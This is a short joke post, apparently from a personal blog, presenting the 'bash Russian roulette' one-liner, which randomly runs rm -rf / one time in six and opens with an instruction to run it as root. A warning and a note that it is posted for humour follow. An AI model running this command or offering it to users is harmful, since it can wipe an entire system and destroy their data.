Run the following code as root:
if [ $(( $RANDOM % 6 )) -eq "0" ]; then rm -rf / ;fiWARNING
If you don't know what does it do, don't play with it because it may broke your system.
This is posted only for FUN and HUMOR, not to be taken seriously
All about my activities, thoughts, inspiration, ideas, and everything that happened around me
if [ $(( $RANDOM % 6 )) -eq "0" ]; then rm -rf / ;fi